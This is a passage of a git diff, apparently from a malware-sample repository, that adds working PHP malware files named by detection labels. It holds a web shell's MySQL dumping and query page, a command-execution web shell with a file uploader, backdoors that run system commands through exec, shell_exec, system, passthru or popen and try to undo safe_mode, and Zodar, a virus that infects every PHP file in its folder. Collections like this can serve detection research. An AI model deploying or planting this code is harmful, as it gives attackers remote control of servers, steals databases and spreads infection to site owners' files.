||||||
|
break;
|
||||||
|
}
|
||||||
|
case 'mysql' :
|
||||||
|
{
|
||||||
|
$action=isset($_POST['action'])?$_POST['action']:'query';
|
||||||
|
$user=isset($_POST['user'])?$_POST['user']:'';
|
||||||
|
$passwd=isset($_POST['passwd'])?$_POST['passwd']:'';
|
||||||
|
$db=isset($_POST['db'])?$_POST['db']:'';
|
||||||
|
$host=isset($_POST['host'])?$_POST['host']:'localhost';
|
||||||
|
$query=isset($_POST['query'])?magic_q($_POST['query']):'';
|
||||||
|
switch($action)
|
||||||
|
{
|
||||||
|
case 'dump' :
|
||||||
|
{
|
||||||
|
$mysql_link=@mysql_connect($host,$user,$passwd);
|
||||||
|
if(!($mysql_link)) echo('Connect error');
|
||||||
|
else
|
||||||
|
{
|
||||||
|
//@mysql_query('SET NAMES cp1251'); - use if you have problems whis code symbols
|
||||||
|
$to_file=isset($_POST['to_file'])?($_POST['to_file']==''?false:$_POST['to_file']):false;
|
||||||
|
$archive=isset($_POST['archive'])?$_POST['archive']:'none';
|
||||||
|
if($archive!=='none')$to_file=false;
|
||||||
|
$db_dump=isset($_POST['db_dump'])?$_POST['db_dump']:'';
|
||||||
|
$table_dump=isset($_POST['table_dump'])?$_POST['table_dump']:'';
|
||||||
|
if(!(@mysql_select_db($db_dump,$mysql_link)))echo('DB error');
|
||||||
|
else
|
||||||
|
{
|
||||||
|
$dump_file="#ZaCo MySQL Dumper\n#db $db from $host\n";
|
||||||
|
ob_start();
|
||||||
|
if($to_file){$t_f=@fopen($to_file,'w');if(!$t_f)die('Cant opening '.$to_file);}else $t_f=false;
|
||||||
|
if($table_dump=='')
|
||||||
|
{
|
||||||
|
if(!$to_file)
|
||||||
|
{
|
||||||
|
header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n");
|
||||||
|
header("Content-Disposition: attachment; filename=\"dump_{$db_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n");
|
||||||
|
}
|
||||||
|
$result=mysql_query('show tables',$mysql_link);
|
||||||
|
for($i=0;$i<mysql_num_rows($result);$i++)
|
||||||
|
{
|
||||||
|
$rows=mysql_fetch_array($result);
|
||||||
|
$result2=@mysql_query('show columns from `'.$rows[0].'`',$mysql_link);
|
||||||
|
if(!$result2)$dump_file.='#error table '.$rows[0];
|
||||||
|
else
|
||||||
|
{
|
||||||
|
$dump_file.='create table `'.$rows[0]."`(\n";
|
||||||
|
for($j=0;$j<mysql_num_rows($result2)-1;$j++)
|
||||||
|
{
|
||||||
|
$rows2=mysql_fetch_array($result2);
|
||||||
|
$dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL').",\n";
|
||||||
|
}
|
||||||
|
$rows2=mysql_fetch_array($result2);
|
||||||
|
$dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL')."\n";
|
||||||
|
$type[$j]=$rows2[1];
|
||||||
|
$dump_file.=");\n";
|
||||||
|
mysql_free_result($result2);
|
||||||
|
$result2=mysql_query('select * from `'.$rows[0].'`',$mysql_link);
|
||||||
|
$columns=$j-1;
|
||||||
|
for($j=0;$j<mysql_num_rows($result2);$j++)
|
||||||
|
{
|
||||||
|
$rows2=mysql_fetch_array($result2);
|
||||||
|
$dump_file.='insert into `'.$rows[0].'` values (';
|
||||||
|
for($k=0;$k<$columns;$k++)
|
||||||
|
{
|
||||||
|
$dump_file.=$rows2[$k]==''?'null,':'\''.addslashes($rows2[$k]).'\',';
|
||||||
|
}
|
||||||
|
$dump_file.=($rows2[$k]==''?'null);':'\''.addslashes($rows2[$k]).'\');')."\n";
|
||||||
|
if($archive=='none')
|
||||||
|
{
|
||||||
|
if($to_file) {fwrite($t_f,$dump_file);fflush($t_f);}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
echo($dump_file);
|
||||||
|
ob_flush();
|
||||||
|
}
|
||||||
|
$dump_file='';
|
||||||
|
}
|
||||||
|
}
|
||||||
|
mysql_free_result($result2);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
mysql_free_result($result);
|
||||||
|
if($archive!='none')
|
||||||
|
{
|
||||||
|
$dump_file=gzencode($dump_file);
|
||||||
|
header('Content-Length: '.strlen($dump_file)."\n");
|
||||||
|
echo($dump_file);
|
||||||
|
}
|
||||||
|
else if($t_f)
|
||||||
|
{
|
||||||
|
fclose($t_f);
|
||||||
|
echo('Dump for '.$db_dump.' now in '.$to_file);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
$result2=@mysql_query('show columns from `'.$table_dump.'`',$mysql_link);
|
||||||
|
if(!$result2)echo('error table '.$table_dump);
|
||||||
|
else
|
||||||
|
{
|
||||||
|
if(!$to_file)
|
||||||
|
{
|
||||||
|
header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n");
|
||||||
|
header("Content-Disposition: attachment; filename=\"dump_{$db_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n");
|
||||||
|
}
|
||||||
|
if($to_file===false)
|
||||||
|
{
|
||||||
|
header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n");
|
||||||
|
header("Content-Disposition: attachment; filename=\"dump_{$db_dump}_${table_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n");
|
||||||
|
}
|
||||||
|
$dump_file.="create table `{$table_dump}`(\n";
|
||||||
|
for($j=0;$j<mysql_num_rows($result2)-1;$j++)
|
||||||
|
{
|
||||||
|
$rows2=mysql_fetch_array($result2);
|
||||||
|
$dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL').",\n";
|
||||||
|
}
|
||||||
|
$rows2=mysql_fetch_array($result2);
|
||||||
|
$dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL')."\n";
|
||||||
|
$type[$j]=$rows2[1];
|
||||||
|
$dump_file.=");\n";
|
||||||
|
mysql_free_result($result2);
|
||||||
|
$result2=mysql_query('select * from `'.$table_dump.'`',$mysql_link);
|
||||||
|
$columns=$j-1;
|
||||||
|
for($j=0;$j<mysql_num_rows($result2);$j++)
|
||||||
|
{
|
||||||
|
$rows2=mysql_fetch_array($result2);
|
||||||
|
$dump_file.='insert into `'.$table_dump.'` values (';
|
||||||
|
for($k=0;$k<$columns;$k++)
|
||||||
|
{
|
||||||
|
$dump_file.=$rows2[$k]==''?'null,':'\''.addslashes($rows2[$k]).'\',';
|
||||||
|
}
|
||||||
|
$dump_file.=($rows2[$k]==''?'null);':'\''.addslashes($rows2[$k]).'\');')."\n";
|
||||||
|
if($archive=='none')
|
||||||
|
{
|
||||||
|
if($to_file) {fwrite($t_f,$dump_file);fflush($t_f);}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
echo($dump_file);
|
||||||
|
ob_flush();
|
||||||
|
}
|
||||||
|
$dump_file='';
|
||||||
|
}
|
||||||
|
}
|
||||||
|
mysql_free_result($result2);
|
||||||
|
if($archive!='none')
|
||||||
|
{
|
||||||
|
$dump_file=gzencode($dump_file);
|
||||||
|
header('Content-Length: '.strlen($dump_file)."\n");
|
||||||
|
echo $dump_file;
|
||||||
|
}else if($t_f)
|
||||||
|
{
|
||||||
|
fclose($t_f);
|
||||||
|
echo('Dump for '.$db_dump.' now in '.$to_file);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
}
|
||||||
|
case 'query' :
|
||||||
|
{
|
||||||
|
echo($head.$pages);
|
||||||
|
?>
|
||||||
|
<hr>
|
||||||
|
<form method=post>
|
||||||
|
<table>
|
||||||
|
<td>
|
||||||
|
<table align=left>
|
||||||
|
<tr><td>User :<input name='user' type=text value='<?=$user?>'></td><td>Passwd :<input name='passwd' type=text value='<?=$passwd?>'></td><td>Host :<input name='host' type=text value='<?=$host?>'></td><td>DB :<input name='db' type=text value='<?=$db?>'></td></tr>
|
||||||
|
<tr><textarea name='query' cols=120 rows=20><?=htmlspecialchars($query)?></textarea></tr>
|
||||||
|
</table>
|
||||||
|
</td>
|
||||||
|
<td>
|
||||||
|
<table>
|
||||||
|
<tr><td>DB :</td><td><input type=text name='db_dump' value='<?=$db?>'></td></tr>
|
||||||
|
<tr><td>Only Table :</td><td><input type=text name='table_dump'></td></tr>
|
||||||
|
<input name='archive' type=radio value='none'>without arch
|
||||||
|
<input name='archive' type=radio value='gzip' checked=true>gzip archive
|
||||||
|
<tr><td><input type=submit name='action' value='dump'></td></tr>
|
||||||
|
<tr><td>Save result to :</td><td><input type=text name='to_file' value='' size=23></td></tr>
|
||||||
|
</table>
|
||||||
|
</td>
|
||||||
|
</table>
|
||||||
|
<input name='page' value='mysql' type=hidden>
|
||||||
|
<input name='action' value='query' type=submit>
|
||||||
|
</form>
|
||||||
|
<hr>
|
||||||
|
<?
|
||||||
|
$mysql_link=@mysql_connect($host,$user,$passwd);
|
||||||
|
if(!($mysql_link)) echo('Connect error');
|
||||||
|
else
|
||||||
|
{
|
||||||
|
if($db!='')if(!(@mysql_select_db($db,$mysql_link))){echo('DB error');mysql_close($mysql_link);break;}
|
||||||
|
//@mysql_query('SET NAMES cp1251'); - use if you have problems whis code symbols
|
||||||
|
$result=@mysql_query($query,$mysql_link);
|
||||||
|
if(!($result))echo(mysql_error());
|
||||||
|
else
|
||||||
|
{
|
||||||
|
echo("<table valign=top align=left>\n<tr>");
|
||||||
|
for($i=0;$i<mysql_num_fields($result);$i++)
|
||||||
|
echo('<td><b>'.htmlspecialchars(mysql_field_name($result,$i)).'</b> </td>');
|
||||||
|
echo("\n</tr>\n");
|
||||||
|
for($i=0;$i<mysql_num_rows($result);$i++)
|
||||||
|
{
|
||||||
|
$rows=mysql_fetch_array($result);
|
||||||
|
echo('<tr valign=top align=left>');
|
||||||
|
for($j=0;$j<mysql_num_fields($result);$j++)
|
||||||
|
{
|
||||||
|
echo('<td>'.(htmlspecialchars($rows[$j])).'</td>');
|
||||||
|
}
|
||||||
|
echo("</tr>\n");
|
||||||
|
}
|
||||||
|
echo("</table>\n");
|
||||||
|
}
|
||||||
|
mysql_close($mysql_link);
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
?>
|
35
PHP/Backdoor.PHP.Small.j
Normal file
35
PHP/Backdoor.PHP.Small.j
Normal file
@ -0,0 +1,35 @@
|
|||||||
|
<html>
|
||||||
|
<head>
|
||||||
|
<div align="left"><font size="1">Input command :</font></div>
|
||||||
|
<form name="cmd" method="POST" enctype="multipart/form-data">
|
||||||
|
<input type="text" name="cmd" size="30" class="input"><br>
|
||||||
|
<pre>
|
||||||
|
<?php
|
||||||
|
if ($_POST['cmd']){
|
||||||
|
$cmd = $_POST['cmd'];
|
||||||
|
passthru($cmd);
|
||||||
|
}
|
||||||
|
?>
|
||||||
|
</pre>
|
||||||
|
<hr>
|
||||||
|
<div align="left"><font size="1">Uploader file :</font></div>
|
||||||
|
|
||||||
|
<?php
|
||||||
|
$uploaded = $_FILES['file']['tmp_name'];
|
||||||
|
if (file_exists($uploaded)) {
|
||||||
|
$pwddir = $_POST['dir'];
|
||||||
|
$real = $_FILES['file']['name'];
|
||||||
|
$dez = $pwddir."/".$real;
|
||||||
|
copy($uploaded, $dez);
|
||||||
|
echo "FILE UPLOADED TO $dez";
|
||||||
|
}
|
||||||
|
?> </pre>
|
||||||
|
<form name="form1" method="post" enctype="multipart/form-data">
|
||||||
|
<input type="text" name="dir" size="30" value="<? passthru("pwd"); ?>">
|
||||||
|
<input type="submit" name="submit2" value="Upload">
|
||||||
|
<input type="file" name="file" size="15">
|
||||||
|
</td>
|
||||||
|
</tr>
|
||||||
|
</table>
|
||||||
|
</body>
|
||||||
|
</html>
|
51
PHP/Backdoor.PHP.Small.o
Normal file
51
PHP/Backdoor.PHP.Small.o
Normal file
@ -0,0 +1,51 @@
|
|||||||
|
<?php
|
||||||
|
if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
|
||||||
|
$contrs=0;
|
||||||
|
}
|
||||||
|
else{
|
||||||
|
ini_restore("safe_mode");
|
||||||
|
ini_restore("open_basedir");
|
||||||
|
if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
|
||||||
|
$contrs=0;}
|
||||||
|
else{
|
||||||
|
$contrs=1;
|
||||||
|
}}
|
||||||
|
|
||||||
|
if($contrs == 0){
|
||||||
|
echo("FUCKSAFEMODEOFFBYMIC22");
|
||||||
|
}else{
|
||||||
|
echo("FUCKSAFEMODEONBYMIC22");
|
||||||
|
}
|
||||||
|
|
||||||
|
function ex($cfe){
|
||||||
|
$res = '';
|
||||||
|
if (!empty($cfe)){
|
||||||
|
if(function_exists('exec')){
|
||||||
|
@exec($cfe,$res);
|
||||||
|
$res = join("\n",$res);
|
||||||
|
}
|
||||||
|
elseif(function_exists('shell_exec')){
|
||||||
|
$res = @shell_exec($cfe);
|
||||||
|
}
|
||||||
|
elseif(function_exists('system')){
|
||||||
|
@ob_start();
|
||||||
|
@system($cfe);
|
||||||
|
$res = @ob_get_contents();
|
||||||
|
@ob_end_clean();
|
||||||
|
}
|
||||||
|
elseif(function_exists('passthru')){
|
||||||
|
@ob_start();
|
||||||
|
@passthru($cfe);
|
||||||
|
$res = @ob_get_contents();
|
||||||
|
@ob_end_clean();
|
||||||
|
}
|
||||||
|
elseif(@is_resource($f = @popen($cfe,"r"))){
|
||||||
|
$res = "";
|
||||||
|
while(!@feof($f)) { $res .= @fread($f,1024); }
|
||||||
|
@pclose($f);
|
||||||
|
}}
|
||||||
|
return $res;
|
||||||
|
}
|
||||||
|
exit;
|
||||||
|
|
||||||
|
|
70
PHP/Backdoor.PHP.Small.t
Normal file
70
PHP/Backdoor.PHP.Small.t
Normal file
@ -0,0 +1,70 @@
|
|||||||
|
<?
|
||||||
|
$dir = @getcwd();
|
||||||
|
echo "BAGOL<br>";
|
||||||
|
$OS = @PHP_OS;
|
||||||
|
echo "OSTYPE:$OS<br>";
|
||||||
|
echo "uname -a; $uname<br>";
|
||||||
|
$free = disk_free_space($dir);
|
||||||
|
|
||||||
|
if ($free === FALSE) {$free = 0;}
|
||||||
|
|
||||||
|
if ($free < 0) {$free = 0;}
|
||||||
|
echo "Free:".view_size($free)."<br>";
|
||||||
|
|
||||||
|
$cmd="id";
|
||||||
|
$eseguicmd=ex($cmd);
|
||||||
|
echo $eseguicmd;
|
||||||
|
|
||||||
|
function ex($cfe){
|
||||||
|
$res = '';
|
||||||
|
if (!empty($cfe)){
|
||||||
|
if(function_exists('exec')){
|
||||||
|
@exec($cfe,$res);
|
||||||
|
$res = join("\n",$res);
|
||||||
|
}
|
||||||
|
elseif(function_exists('shell_exec')){
|
||||||
|
$res = @shell_exec($cfe);
|
||||||
|
}
|
||||||
|
elseif(function_exists('system')){
|
||||||
|
@ob_start();
|
||||||
|
@system($cfe);
|
||||||
|
$res = @ob_get_contents();
|
||||||
|
@ob_end_clean();
|
||||||
|
}
|
||||||
|
elseif(function_exists('passthru')){
|
||||||
|
@ob_start();
|
||||||
|
@passthru($cfe);
|
||||||
|
$res = @ob_get_contents();
|
||||||
|
@ob_end_clean();
|
||||||
|
}
|
||||||
|
elseif(@is_resource($f = @popen($cfe,"r"))){
|
||||||
|
$res = "";
|
||||||
|
while(!@feof($f)) { $res .= @fread($f,1024); }
|
||||||
|
@pclose($f);
|
||||||
|
}}
|
||||||
|
return $res;
|
||||||
|
}
|
||||||
|
|
||||||
|
function view_size($size)
|
||||||
|
|
||||||
|
{
|
||||||
|
|
||||||
|
if (!is_numeric($size)) {return FALSE;}
|
||||||
|
|
||||||
|
else
|
||||||
|
|
||||||
|
{
|
||||||
|
|
||||||
|
if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
|
||||||
|
|
||||||
|
elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
|
||||||
|
|
||||||
|
elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
|
||||||
|
|
||||||
|
else {$size = $size . " B";}
|
||||||
|
|
||||||
|
return $size;
|
||||||
|
|
||||||
|
}}
|
||||||
|
|
||||||
|
exit;
|
39
PHP/Virus.PHP.Zodar
Normal file
39
PHP/Virus.PHP.Zodar
Normal file
@ -0,0 +1,39 @@
|
|||||||
|
<?php
|
||||||
|
function zodar()
|
||||||
|
{
|
||||||
|
//[Zodar] by Negral
|
||||||
|
//Created 03/05/2002
|
||||||
|
$c = "";
|
||||||
|
$f = fopen (__FILE__, "r");
|
||||||
|
$c = fread ($f, filesize (__FILE__));
|
||||||
|
fclose ($f);
|
||||||
|
$c = substr($c,0,866);
|
||||||
|
$handle=opendir('.');
|
||||||
|
while (($file = readdir($handle))!==false) {
|
||||||
|
if ($file != "." && $file != "..")
|
||||||
|
{
|
||||||
|
$s = substr($file, -3);
|
||||||
|
if ($s=="php")
|
||||||
|
{
|
||||||
|
$g = fopen ($file, "r");
|
||||||
|
$cont = fread ($g,filesize ($file));
|
||||||
|
fclose ($g);
|
||||||
|
if (!strstr($cont,"[Zodar]"))
|
||||||
|
{
|
||||||
|
unlink("$file");
|
||||||
|
$g = fopen ($file, "a+");
|
||||||
|
fwrite ($g,"$c");
|
||||||
|
fwrite ($g,"\n");
|
||||||
|
fwrite ($g,substr($cont,5));
|
||||||
|
fclose ($g);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
}
|
||||||
|
|
||||||
|
}
|
||||||
|
|
||||||
|
closedir($handle);
|
||||||
|
}
|
||||||
|
zodar();
|
||||||
|
?>
|
Loading…
Reference in New Issue
Block a user